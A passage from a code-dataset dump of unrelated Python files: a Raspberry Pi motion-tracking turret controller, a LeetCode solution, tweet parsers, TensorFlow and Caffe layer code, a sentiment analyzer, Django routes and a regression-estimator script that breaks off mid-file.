print(frameDelta)\n thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]\n\n # dilate the thresholded image to fill in holes, then find contours\n # on thresholded image\n thresh = cv2.dilate(thresh, None, iterations=2)\n c = self.get_best_contour(thresh.copy(), 5000)\n\n if c is not None:\n # compute the bounding box for the contour, draw it on the frame,\n # and update the text\n (x, y, w, h) = cv2.boundingRect(c)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n callback(c, frame)\n\n\n\n def get_best_contour(self, imgmask, threshold):\n im, contours, hierarchy = cv2.findContours(imgmask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n best_area = threshold\n best_cnt = None\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if area > best_area:\n best_area = area\n best_cnt = cnt\n return best_cnt\n\n\nclass Turret(object):\n \"\"\"\n Class used for turret control.\n \"\"\"\n\n def __init__(self, camera):\n self.camera = camera\n self.VideoUtils = VideoUtils(camera)\n\n # create a default object, no changes to I2C address or frequency\n self.mh = Adafruit_MotorHAT()\n atexit.register(self.__turn_off_motors)\n\n # Stepper motor 1\n self.sm_x = self.mh.getStepper(200, 1) # 200 steps/rev, motor port #1\n self.sm_x.setSpeed(5) # 5 RPM\n self.current_x_steps = 0\n\n\n # Relay\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(RELAY_PIN, GPIO.OUT)\n GPIO.output(RELAY_PIN, GPIO.LOW)\n\n\n def calibrate(self):\n \"\"\"\n Waits for input to calibrate the turret's axis\n :return:\n \"\"\"\n Turret.move_backward(self.sm_x, 5)\n\n\n def motion_detection_rasp(self, frame):\n \"\"\"\n Uses the camera to move the turret. OpenCV ust be configured to use this.\n :return:\n \"\"\"\n self.VideoUtils.rasp_find_motion(frame, self.__move_axis)\n\n def __move_axis(self, contour, frame):\n (v_h, v_w) = frame.shape[:2]\n (x, y, w, h) = cv2.boundingRect(contour)\n\n # find height\n target_steps_x = (2*MAX_STEPS_X * (x + w / 2) / v_w) - MAX_STEPS_X\n\n print (\"x: %s\" % (str(target_steps_x)))\n print (\"current x: %s\" % (str(self.current_x_steps)))\n\n t_x = threading.Thread()\n\n # move x\n\n stprs_diff = int(target_steps_x - self.current_x_steps)\n print(stprs_diff)\n\n if (target_steps_x - self.current_x_steps) > 1:\n self.current_x_steps += stprs_diff\n t_x = threading.Thread(target=Turret.move_forward, args=(self.sm_x, stprs_diff+1,))\n elif (target_steps_x - self.current_x_steps) < -1:\n self.current_x_steps += stprs_diff\n t_x = threading.Thread(target=Turret.move_backward, args=(self.sm_x, -stprs_diff-1,))\n\n t_x.start()\n\n t_x.join()\n\n def interactive(self):\n \"\"\"\n Starts an interactive session. Key presses determine movement.\n :return:\n \"\"\"\n\n Turret.move_forward(self.sm_x, 1)\n\n print ('Commands: Pivot with (a) and (d). Tilt with (w) and (s). Exit with (q)\\n')\n with raw_mode(sys.stdin):\n try:\n while True:\n ch = sys.stdin.read(1)\n if not ch or ch == \"q\":\n break\n\n if ch == \"a\":\n if MOTOR_X_REVERSED:\n Turret.move_backward(self.sm_x, 5)\n else:\n Turret.move_forward(self.sm_x, 5)\n elif ch == \"d\":\n if MOTOR_X_REVERSED:\n Turret.move_forward(self.sm_x, 5)\n else:\n Turret.move_backward(self.sm_x, 5)\n elif ch == \"\\n\":\n Turret.fire()\n\n except (KeyboardInterrupt, EOFError):\n pass\n\n\n @staticmethod\n def move_forward(motor, steps):\n \"\"\"\n Moves the stepper motor forward the specified number of steps.\n :param motor:\n :param steps:\n :return:\n \"\"\"\n motor.step(steps, Adafruit_MotorHAT.FORWARD, Adafruit_MotorHAT.INTERLEAVE)\n return\n\n @staticmethod\n def move_backward(motor, steps):\n \"\"\"\n Moves the stepper motor backward the specified number of steps\n :param motor:\n :param steps:\n :return:\n \"\"\"\n motor.step(steps, Adafruit_MotorHAT.BACKWARD, Adafruit_MotorHAT.INTERLEAVE)\n return\n\n def __turn_off_motors(self):\n \"\"\"\n Recommended for auto-disabling motors on shutdown!\n :return:\n \"\"\"\n self.mh.getMotor(1).run(Adafruit_MotorHAT.RELEASE)\n self.mh.getMotor(2).run(Adafruit_MotorHAT.RELEASE)\n self.mh.getMotor(3).run(Adafruit_MotorHAT.RELEASE)\n self.mh.getMotor(4).run(Adafruit_MotorHAT.RELEASE)\n return\n","sub_path":"turret.py","file_name":"turret.py","file_ext":"py","file_size_in_byte":7457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"440774770","text":"\"\"\"\nhttps://leetcode.com/problems/diameter-of-binary-tree/\n\n\"\"\"\n# Definition for a binary tree node.\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n import math\n def diameterOfBinaryTree(self, root):\n self.ans=1\n \n def helper(node):\n if not node:\n return 0\n L=helper(node.left)\n R=helper(node.right)\n self.ans=max(self.ans, L+R+1)\n return max(L,R)+1\n \n helper(root)\n return self.ans-1\n \n\nroot = TreeNode(1)\nroot.left = TreeNode(2)\nroot.right = TreeNode(3)\nroot.left.left = TreeNode(4)\nroot.left.right = TreeNode(5)\ns=Solution()\nprint(s.diameterOfBinaryTree(root))","sub_path":"Tree/BT-diameter.py","file_name":"BT-diameter.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"517072201","text":"#mi functions\r\ndef ime(tvit):\r\n return tvit[:tvit.index(':'):]\r\n\r\ndef izloci_besedo(beseda):\r\n nekaj = \"\"\r\n for a in beseda:\r\n if a.isalnum():\r\n nekaj += a\r\n if a == \"-\":\r\n nekaj += a\r\n return nekaj\r\n\r\ndef mentions(besedilo):\r\n\r\n return list\r\n\r\n\r\ndef besedilo(tvit):\r\n return tvit[tvit.index(':') + 2::]\r\n\r\ndef zadnji_tvit(tviti):\r\n slovar = {}\r\n for a in tviti:\r\n slovar[ime(a)] = besedilo(a)\r\n return slovar\r\n\r\ndef prvi_tvit(tviti):\r\n slovar = {}\r\n for a in tviti:\r\n if ime(a) not in slovar:\r\n slovar[ime(a)] = besedilo(a)\r\n return slovar\r\n\r\ndef prestej_tvite(tviti):\r\n slovar = {}\r\n for a in tviti:\r\n if ime(a) not in slovar:\r\n slovar[ime(a)] = 1\r\n else:\r\n slovar[ime(a)] += 1\r\n return slovar\r\n\r\n#TO DELA\r\n\r\ndef omembe(tviti):\r\n slovar = {}\r\n for a in tviti:\r\n if ime(a) not in slovar:\r\n slovar[ime(a)] = []\r\n for n in a.split():\r\n if \"@\" in n:\r\n slovar[ime(a)].append(izloci_besedo(n))\r\n return slovar\r\n\r\ndef neomembe(ime, omembe):\r\n list = []\r\n for a in omembe:\r\n list.append(a)\r\n a = omembe[ime]\r\n ret = []\r\n a.append(ime)\r\n for n in list:\r\n if n not in a:\r\n ret.append(n)\r\n return ret\r\n\r\n","sub_path":"code/batch-2/vse-naloge-brez-testov/DN6-M-113.py","file_name":"DN6-M-113.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"547720855","text":"import tensorflow as tf\n\n\nWINDOW_SIZE = 5\n\nINPUT_CHANNELS = 3\nOUTPUT_CHANNELS = 64\n\n\ndef add_variable_summaries(variable, name):\n tf.histogram_summary(\"%s/histogram\" % name, variable)\n\n\ndef convo_op(image, window_size, input_channels, output_channels, name=\"\"):\n \"\"\"Create a convolutional layer\n\n Args:\n image: image tensor\n window_size: height and width of the window\n input_channels: number of channels from input\n output_channels: number of channels from output\n\n Returns:\n convolutional layer\n \"\"\"\n\n # create weight for the window\n # window has size 5x5\n # 3 input channels, 3 feature maps\n convo_weights = tf.Variable(\n tf.truncated_normal([\n window_size,\n window_size,\n input_channels,\n output_channels\n ], stddev=0.01, dtype=tf.float32),\n name=\"%s_weights\" % name)\n add_variable_summaries(convo_weights, \"%s_weights\" % name)\n\n convo_biases = tf.Variable(\n tf.zeros([\n output_channels\n ], dtype=tf.float32),\n name=\"%s_biases\" % name)\n add_variable_summaries(convo_biases, \"%s_biases\" % name)\n\n # convolute over the image\n # output image has the same size as the input\n convo = tf.nn.conv2d(image, convo_weights,\n strides=[1, 1, 1, 1],\n padding=\"SAME\", name=\"%s_convo\" % name)\n\n # add biases to the each convoluted output pixel\n bias = tf.nn.bias_add(convo, convo_biases, name=\"%s_bias\" % name)\n\n # non-linear function\n # using relu here\n non_linear = tf.sigmoid(bias, name=name)\n\n return non_linear\n\n\ndef max_pool_layer(image, window_size, strides, name=\"\"):\n \"\"\"Create max pooling layer\n Args:\n image: image tensor (a batch of images)\n window_size: size of the pooling window\n\n Returns:\n max pooling layer\n \"\"\"\n\n return tf.nn.max_pool(\n image,\n ksize=[1, window_size, window_size, 1],\n strides=[1, strides, strides, 1],\n padding=\"VALID\",\n name=name\n )\n\n\ndef full_connected_hidden_layer(\n x,\n input_len,\n hidden_units,\n stddev,\n non_linear_op,\n name=\"\"):\n \"\"\"Create a fully connected hidden layer\n Args:\n x: 1-D input vector\n input_len: input's dimension\n hidden_units: number of hidden units\n non_linear_op: non-linear operation\n\n Returns:\n Hidden layer output\n \"\"\"\n\n # weight matrix with shape (input_len, hidden_units)\n weights = tf.Variable(\n tf.truncated_normal(\n [input_len, hidden_units],\n mean=0.0,\n stddev=stddev,\n dtype=tf.float32\n ),\n name=\"%s_weights\" % name\n )\n add_variable_summaries(weights, \"%s_weights\" % name)\n\n # biases\n biases = tf.Variable(\n tf.zeros([hidden_units], dtype=tf.float32),\n name=\"%s_biases\" % name\n )\n add_variable_summaries(biases, \"%s_biases\" % name)\n\n # affine transformation\n affine_transformation = tf.matmul(x, weights) + biases\n\n # non-linear transformation\n non_linear_transformation = non_linear_op(\n affine_transformation,\n name=name\n )\n add_variable_summaries(non_linear_transformation, \"%s_activation\" % name)\n\n return non_linear_transformation\n\n\ndef output_layer(\n x,\n y,\n input_len,\n hidden_units,\n stddev,\n name=\"\"):\n \"\"\"Output using softmax layer\n \"\"\"\n\n # weight matrix with shape (input_len, hidden_units)\n weights = tf.Variable(\n tf.truncated_normal(\n [input_len, hidden_units],\n mean=0.0,\n stddev=stddev,\n dtype=tf.float32\n ),\n name=\"%s_weights\" % name\n )\n add_variable_summaries(weights, \"%s_weights\" % name)\n\n # biases\n biases = tf.Variable(\n tf.zeros([hidden_units], dtype=tf.float32),\n name=\"%s_biases\" % name\n )\n add_variable_summaries(biases, \"%s_biases\" % name)\n\n # affine transformation\n logits = tf.matmul(x, weights) + biases\n\n labels = tf.cast(y, tf.int64)\n\n return tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits,\n labels, name=name)\n\n\ndef loss_layer(predicted, actual):\n \"\"\"Calculate loss function with maximum likelyhood\n\n Args:\n predicted: predicted value\n actual: actual value\n\n Returns:\n loss value\n \"\"\"\n\n return tf.reduce_mean(\n -tf.reduce_sum(\n actual * tf.log(predicted),\n reduction_indices=[1]),\n name=\"loss_function\"\n )\n","sub_path":"cifar/src/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"248860563","text":"#!/usr/bin/python\n\nfrom CaffeAdapter import *\nfrom caffe.proto import caffe_pb2 as Proto\nfrom pymill import Toolbox as tb\nimport os\n\n\ndef PhilData_OpticalFlow(net, **kwargs):\n '''\n @brief Setup PhilDataLayer for optical flow\n @returns A list of layer output blobs\n '''\n data_param = {'source' : kwargs['source'],\n 'backend' : Params.Data.LMDB,\n 'batch_size' : kwargs['batch_size'],\n 'encoding' : (Proto.DataParameter.UINT8,\n Proto.DataParameter.UINT8,\n Proto.DataParameter.UINT16FLOW,\n Proto.DataParameter.BOOL1),\n 'slice_point': (3, 6, 8),\n 'verbose' : kwargs['verbose'],\n 'rand_permute' : kwargs['rand_permute'],\n 'rand_permute_seed' : kwargs['rand_permute_seed']}\n\n if 'preselection_file' in kwargs: data_param['preselection_file'] = kwargs['preselection_file']\n if 'preselection_label' in kwargs: data_param['preselection_label'] = kwargs['preselection_label']\n\n ## Always returns (img_from, img_to, flow, occlusion)\n return Layers.PhilData(net, nout=4,\n include=(Proto.NetStateRule(phase=kwargs['phase']),),\n data_param=data_param)\n\n\ndef PhilData(net, **kwargs):\n '''\n @brief Setup network inputs by instantiating a PhilDataLayer\n @returns A list of single-blob network INPUT and LABEL\n '''\n\n if 'source' not in kwargs: \n raise Exception('PhilData requires parameter >source<')\n\n if not os.path.exists(kwargs['source']):\n raise Exception('PhilData: >source< %s does not exist'\n %(kwargs['source']))\n\n def default(arg, val):\n if not arg in kwargs:\n kwargs[arg] = val\n \n default('phase', 'TRAIN')\n default('batch_size', 1)\n default('verbose', True)\n default('rand_permute', True)\n default('rand_permute_seed', 77)\n\n if kwargs['phase'] == 'TEST': kwargs['phase'] = Proto.TEST\n if kwargs['phase'] == 'TRAIN': kwargs['phase'] = Proto.TRAIN\n\n return PhilData_OpticalFlow(net, **kwargs)\n","sub_path":"python/pymill/CNN/Definition/PhilData.py","file_name":"PhilData.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"289401200","text":"import sys\nimport re\nfrom utils_plot import Utilities\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nimport matplotlib.dates as mdates\n\nimport matplotlib\nimport pandas as pd\nimport csv\nimport os\n\n\n# import importlib\n# importlib.reload(sys)\nreload(sys) \nsys.setdefaultencoding('utf-8')\n\nclass Analyzer(object):\n def __init__(self, group):\n self.group = group\n self.display = (self.group == \"event_id\")\n\n # Load the positive and negative words\n self.words = {}\n with open(\"words/positive.txt\") as file:\n for line in file:\n self.words[line.rstrip()] = 1\n with open(\"words/negative.txt\") as file:\n for line in file:\n self.words[line.rstrip()] = -1\n\n def analyze(self, message):\n score = 0\n found = 0\n disp = \"\"\n\n i = 0\n # try:\n parts = Utilities.split(message)\n # except AttributeError as e:\n # print message #None\n\n for w in parts:\n if w in self.words:\n score += self.words[w]\n found += 1\n if self.display:\n i = message.lower().find(w, i)\n d = Utilities.get_colored_text(self.words[w], message[i:i+len(w)])\n message = message[:i] + d + message[i+len(w):]\n i = i + len(d)\n\n disp += d + \" \"\n\n label = score / float(found) if found != 0 else 0.0\n return (label, disp, message)\n\n def output(self, group, message, label, disp, time):\n f = open('result.txt','a')\n f.write(\"{}\\t{:.2f}\".format(time,label))\n f.write('\\n')\n f.close()\n\n def reprocess(self, name): \n dataframe = pd.read_csv(name)\n dataframe = dataframe.groupby('repo').sum()\n\n new_name = name[:-4] + '_pcsed.csv'\n dataframe.to_csv(new_name,index=True,sep=',')\n\n # plot function need to be rewritten using csv\n def plot(self):\n f = open('result.txt','r')\n\n plt.figure(figsize=(20,6))\n dates = []\n Y1 = []\n for line in f.readlines():\n dates.append(line.split('\\t')[0])\n Y1.append(float(line.split('\\t')[1]))\n\n f.close()\n X=range(len(dates))\n\n # plt.bar(X, Y1, width = 0.35,facecolor = 'lightskyblue',edgecolor = 'white')\n plt.plot(X, Y1, 'co-')\n # plt.bar(X,Y1,width = 0.35,facecolor = 'lightskyblue',edgecolor = 'white')\n plt.xticks(X,dates,rotation=25)\n plt.margins(0.08)\n plt.subplots_adjust(bottom=0.15)\n plt.xlabel('time')\n plt.ylabel('rate')\n\n plt.show()\n\ndef main(argv):\n path = argv[0]\n\n group = \"id\"\n analyzer = Analyzer(\"id\")\n f = open(path,'r')\n\n for data in Utilities.read_json(f, group=group):\n\n # data['message'] -- text, data['group'] -- id\n # print data\n if data['message'] == None: continue;\n\n (label, disp, message) = analyzer.analyze(data[\"message\"])\n group = data[\"group\"] if \"group\" in data else \"\"\n \n raw_time = data['time']\n time = re.findall(r\"(.+?)T\",raw_time)[0]+' '+re.findall(r\"T(.+?)Z\",raw_time)[0]\n \n # repo = data['repo']\n\n analyzer.output(group, message, label, disp, time) \n # analyzer.output(group, message, label, disp)\n\n # analyzer.plot()\n # analyzer.reprocess(name)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"analyze_plot.py","file_name":"analyze_plot.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"538477466","text":"#Runfile for 06-07-15\n\n\n#Reconfirm that the correlations come back\nagi_off() \nsinglet_pos_vec = [0.098,0.105,0.0005]\n# AWG_dual_Load_Move(reps = 1, shots=200, bdown=False, cdown=True, width = 0.05)\n# AWG_dual_Load_Move(reps = 1, shots=200, bdown=False, cdown=True, width = 50e-6)\n\n\n#with new version of AGI\n# singlet_pos_vec = [0.102,0.107,0.00025]\n# Fast_dual_Load_Move(reps = 1, shots=200, bdown=False, cdown=True, width = 10e-6, ramp = 0)\n\n#with old version of AGI\n# singlet_pos_vec = [0.09,0.12,0.001]\n# Fast_dual_Load_Move(reps = 1, shots=200, bdown=False, cdown=True, width = 10e-6, ramp = 0)\n\n#Again with new version of AGI so ramp can be implemented.\n# singlet_pos_vec = [0.09,0.108,0.001]\n# Fast_dual_Load_Move(reps = 2, shots=200, bdown=False, cdown=True, width = 10e-6, ramp = 1e-6)\n\n#with old version of AGI\n# singlet_pos_vec = [0.09,0.12,0.002]\n# Fast_dual_Load_Move(reps = 1, shots=200, bdown=False, cdown=True, width = 10e-6, ramp = 0)\n\n\n#Do a map with the older version of the AGI without the ramp function\nsinglet_wait_vec = logspace(log10(1e-9),log10(50e-6),15).tolist()\nsinglet_pos_vec = [0.096,0.105,0.00025]\nFast_dual_Load_Map(reps = 4, shots=200, bdown=False, cdown=True)","sub_path":"bilby/aff_scripts/dev053/dev53_run_06_7_15.py","file_name":"dev53_run_06_7_15.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"325647966","text":"from django.urls import include, path\nfrom rest_framework.routers import SimpleRouter\n\nfrom .views import (FavoriteView, IngredientView, RecipeView,\n ShoppingCartDownloadView, ShoppingCartView, SubscribeView,\n SubscriptionsView, TagView)\n\nmain_router = SimpleRouter()\nmain_router.register(\"tags\", TagView)\nmain_router.register(\"ingredients\", IngredientView)\nmain_router.register(\"recipes\", RecipeView)\n\nurlpatterns = [\n path(\n \"users/subscriptions/\",\n SubscriptionsView.as_view({\"get\": \"list\"}),\n name=\"subscriptions\",\n ),\n path(\n \"users//subscribe/\", SubscribeView.as_view(), name=\"subscribe\"\n ),\n path(\n \"recipes//favorite/\", FavoriteView.as_view(), name=\"favorite\"\n ),\n path(\n \"recipes//shopping_cart/\",\n ShoppingCartView.as_view(),\n name=\"shopping_cart\",\n ),\n path(\n \"recipes/download_shopping_cart/\",\n ShoppingCartDownloadView.as_view(),\n name=\"download_shopping_cart\",\n ),\n path(\"\", include(main_router.urls)),\n]\n","sub_path":"backend/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"140420172","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 27 10:22:24 2019\n\n@author: mjr583\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 27 10:07:19 2019\n\n@author: mjr583\n\"\"\"\n\n\"\"\"Demonstrate how to calculate various linear regression estimates.\nCopyright (C) 2019 Mikko Pitkanen\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport scipy.odr\nimport pystan\nimport statsmodels.formula.api as smf\nimport scipy as sc\nfrom sklearn.decomposition import PCA\n\n\ndef bayes_ols_fit(xi, yi):\n \"\"\"Perform non-weighted OLS regression using Bayesian inference.\n This model does not take into account the uncertainties in the data, for a\n model that properly takes into account the uncertainties see, for example,\n Stan manual\n https://mc-stan.org/docs/2_19/stan-users-guide/bayesian-measurement-error-model.html\n (valid on 2019-05-18)\n \"\"\"\n # define stan model\n model = \"\"\"\n data {\n int N; // number of cases\n vector[N] x;\n vector[N] y; // outcome (variate)\n real sigma; // outcome noise\n }\n parameters {\n real intercept;\n real slope;\n }\n model {\n y ~ normal(intercept + slope * x, sigma);\n }\n \"\"\"\n\n n = len(xi)\n ind = np.arange(n)\n\n # formalize input data\n data = {\n 'N': n,\n 'x': xi[ind],\n 'y': yi[ind],\n 'sigma': np.std(yi)}\n\n sm_OLS = pystan.StanModel(model_code=model)\n\n # make OLS fit to get initial guesses for slope and intercept\n slope_ols, intercept_ols = np.polyfit(x, y, 1)\n\n fit = sm_OLS.sampling(\n data=data,\n iter=1000,\n chains=4,\n init=lambda: {\n 'x': xi[ind],\n 'y': yi[ind],\n 'slope': slope_ols,\n 'intercept': intercept_ols},\n algorithm=\"NUTS\",\n n_jobs=4)\n\n # find the index for maximum a posteriori (MAP) values\n samples = fit.extract(permuted=True)\n lp = samples['lp__']\n MAPindex = np.argmax(lp)\n\n # use MAP values for slope and intercept\n slope = samples['slope'][MAPindex]\n intercept = samples['intercept'][MAPindex]\n\n return slope, intercept\n\n\ndef bivariate_fit(xi, yi, dxi, dyi, ri=0.0, b0=1.0, maxIter=1e6):\n \"\"\"Perform bivariate regression by York et al. 2004.\n This is an implementation of the line fitting algorithm presented in:\n York, D et al., Unified equations for the slope, intercept, and standard\n errors of the best straight line, American Journal of Physics, 2004, 72,\n 3, 367-375, doi = 10.1119/1.1632486\n See especially Section III and Table I. The enumerated steps below are\n citations to Section III\n Parameters:\n xi, yi np.array, x and y values\n dxi, dyi np.array, errors for the data points xi, yi\n ri float, correlation coefficient for the weights\n b0 float, initial guess for slope\n maxIter float, maximum allowed number of iterations. this is to escape\n possible non-converging iteration loops\n Returns:\n b slope estimate\n a intercept estimate\n S goodness-of-fit estimate\n cov covariance matrix of the estimated slope and intercept values\n \"\"\"\n # (1) Choose an approximate initial value of b\n # make OLS fit to get the initial guesses for slope\n slope_ols, intercept_ols = np.polyfit(x, y, 1)\n b = slope_ols\n\n # (2) Determine the weights wxi, wyi, for each point.\n wxi = 1.0 / dxi**2.0\n wyi = 1.0 / dyi**2.0\n\n alphai = (wxi * wyi)**0.5\n b_diff = 999.0\n\n # tolerance for the fit, when b changes by less than tol for two\n # consecutive iterations, fit is considered found\n tol = 1.0e-8\n\n # iterate until b changes less than tol\n iIter = 1\n while (abs(b_diff) >= tol) & (iIter <= maxIter):\n\n b_prev = b\n\n # (3) Use these weights wxi, wyi to evaluate Wi for each point.\n Wi = (wxi * wyi) / (wxi + b**2.0 * wyi - 2.0*b*ri*alphai)\n\n # (4) Use the observed points (xi ,yi) and Wi to calculate x_bar and\n # y_bar, from which Ui and Vi , and hence betai can be evaluated for\n # each point\n x_bar = np.sum(Wi * xi) / np.sum(Wi)\n y_bar = np.sum(Wi * yi) / np.sum(Wi)\n\n Ui = xi - x_bar\n Vi = yi - y_bar\n\n betai = Wi * (Ui / wyi + b*Vi / wxi - (b*Ui + Vi) * ri / alphai)\n\n # (5) Use Wi, Ui, Vi, and betai to calculate an improved estimate of b\n b = np.sum(Wi * betai * Vi) / np.sum(Wi * betai * Ui)\n\n # (6) Use the new b and repeat steps (3), (4), and (5) until successive\n # estimates of b agree within some desired tolerance tol\n b_diff = b - b_prev\n\n iIter += 1\n\n # (7) From this final value of b, together with the final x_bar and y_bar,\n # calculate a from\n a = y_bar - b * x_bar\n\n # Goodness of fit\n S = np.sum(Wi * (yi - b*xi - a)**2.0)\n\n # (8) For each point (xi, yi), calculate the adjusted values xi_adj\n xi_adj = x_bar + betai\n\n # (9) Use xi_adj, together with Wi, to calculate xi_adj_bar and thence ui\n xi_adj_bar = np.sum(Wi * xi_adj) / np.sum(Wi)\n ui = xi_adj - xi_adj_bar\n\n # (10) From Wi , xi_adj_bar and ui, calculate sigma_b, and then sigma_a\n # (the standard uncertainties of the fitted parameters)\n sigma_b = np.sqrt(1.0 / np.sum(Wi * ui**2))\n sigma_a = np.sqrt(1.0 / np.sum(Wi) + xi_adj_bar**2 * sigma_b**2)\n\n # calculate covariance matrix of slope and intercept (York et al.,\n # Section II)\n cov = -xi_adj_bar * sigma_b**2\n # [[var(b), cov], [cov, var(a)]]\n cov_matrix = np.array(\n [[sigma_b**2, cov], [cov, sigma_a**2]])\n\n if iIter <= maxIter:\n return b, a, S, cov_matrix\n else:\n print(\"bivariate_fit() exceeded maximum number of iterations, \" +\n \"maxIter = {:}\".format(maxIter))\n return np.nan, np.nan, np.nan, np.nan\n\n\ndef deming_fit(xi, yi):\n \"\"\"Perform Deming regression.\n Nomenclature follows:\n Francq, Bernard G., and Bernadette B. Govaerts. 2014. \"Measurement Methods\n Comparison with Errors-in-Variables Regressions. From Horizontal to\n Vertical OLS Regression, Review and New Perspectives.\" Chemometrics and\n Intelligent Laboratory Systems. Elsevier.\n doi:10.1016/j.chemolab.2014.03.006.\n Parameters:\n xi, yi np.array, x and y values\n Returns:\n slope regression slope estimate\n intercept regression intercept estimate\n \"\"\"\n Sxx = np.sum((xi - np.mean(xi)) ** 2)\n Syy = np.sum((yi - np.mean(yi)) ** 2)\n Sxy = np.sum((xi - np.mean(xi)) * (yi - np.mean(yi)))\n lambda_xy = (np.var(yi) / np.size(yi)) / (np.var(xi) / np.size(xi))\n\n slope = (Syy - lambda_xy * Sxx +\n np.sqrt((Syy - lambda_xy * Sxx) ** 2 +\n 4 * lambda_xy * (Sxy ** 2))) / (2 * Sxy)\n\n intercept = np.mean(yi) - slope * np.mean(xi)\n\n return slope, intercept\n\n\ndef odr_fit(xi, yi, dxi, dyi):\n \"\"\"Perform weighted orthogonal distance regression.\n https://docs.scipy.org/doc/scipy/reference/odr.html (valid on 2019-04-16)\n Parametes:\n xi, yi np.array, x and y values\n dxi, dxy np.array, x and y errors\n Returns:\n slope regression slope estimate\n intercept regression intercept estimate\n \"\"\"\n def f(B, x):\n \"\"\"Define linear function y = a * x + b for ODR.\n Parameters:\n B [slope, intercept]\n x x values\n \"\"\"\n return B[0] * x + B[1]\n\n # define the model for ODR\n linear = scipy.odr.Model(f)\n\n # formalize the data\n data = scipy.odr.RealData(\n xi,\n yi,\n sx=dxi,\n sy=dyi)\n\n # make OLS fit to get initial guesses for slope and intercept\n slope_ols, intercept_ols = np.polyfit(x, y, 1)\n\n # instantiate ODR with your data, model and initial parameter estimate\n # use OLS regression coefficients as initial guess\n odr = scipy.odr.ODR(\n data,\n linear,\n beta0=[slope_ols, intercept_ols])\n\n # run the fit\n output = odr.run()\n slope, intercept = output.beta\n\n return slope, intercept\n\n\ndef pca_fit(xi, yi):\n \"\"\"Estimate principal component regression fit to xi, yi data.\n See eg. https://shankarmsy.github.io/posts/pca-vs-lr.html (valid on\n 2019-04-17)\n Parameters:\n xi, yi x and y data points\n Returns:\n a y-intercept, y = a + bx\n b slope\n Example:\n [slope, intercept] = pca_fit( xi, yi, dxi, dyi, ri, b0 )\n \"\"\"\n #\n\n xy = np.array([xi, yi]).T\n\n pca = PCA(n_components=1)\n xy_pca = pca.fit_transform(xy)\n\n xy_n = pca.inverse_transform(xy_pca)\n slope = (xy_n[0, 1] - xy_n[1, 1])/(xy_n[0, 0] - xy_n[1, 0])\n intercept = xy_n[0, 1] - slope * xy_n[0, 0]\n\n return slope, intercept\n\n\ndef quantile_fit(xi, yi, q=0.5):\n \"\"\"Perform quantile regression.\n See for instance:\n https://www.statsmodels.org/dev/examples/notebooks/generated/quantile_regression.html\n (valid on 2091-04-16)\n Parametes:\n xi, yi np.array, x and y values\n Returns:\n slope regression slope estimate\n intercept regression intercept estimate\n \"\"\"\n data = {'xi': xi, 'yi': yi}\n\n df = pd.DataFrame.from_dict(data=data)\n\n mod = smf.quantreg('yi ~ xi', df)\n res = mod.fit(q=q)\n\n # return slope, intercept, covariance_matrix\n return res.params['xi'], res.params['Intercept'], res.cov_params().values\n\n\nif __name__ == \"__main__\":\n \"\"\"Demonstrate statistical inference using linear regression line fitting.\n Purpose: make linear regression with different estimators on x and y data\n with uncertainties. The correct linear model is y = 1.5x - 2.0. Try and\n answer:\n - which of the estimators is the best and why?\n - which of the methods consider x and y uncertainty and which ones don't?\n Also, try to replace x, y, dx and dy with your own data.\n Please note, that some methods, like OLS, have limitations that make it\n unsuitable/not optimal for this particular task!\n The script has been tested in a conda environment (see\n https://www.anaconda.com/distribution/#download-section for more info on\n that):\n conda create --name ito python=3.7 numpy==1.16.2 matplotlib==3.0.3 pandas==0.24.2 ipython==7.4.0 pystan==2.17.1.0 scipy==1.2.1 scikit-learn==0.20.3 statsmodels==0.9.0\n On linux you can run this from the command line by calling:\n python regression_estimators.py\n You can run this in Ipython by calling:\n run regression_estimators.py\n \"\"\"\n # define absolute and relative standard uncertainties for x and y data sets\n sigma_x_abs = 0.1\n sigma_x_rel = 0.05\n sigma_y_abs = 0.1\n sigma_y_rel = 0.05\n\n # define the real regression parameters\n slope_true=0#1.5\n intercept_true=1800\n\n # define test data set points. These were generated with\n # 1. create normally distributed and independent random x values\n # 2. y = slope_true * x + intercept_true\n # 3. add normally distributed and independent random noise to x and y\n \n filepath = 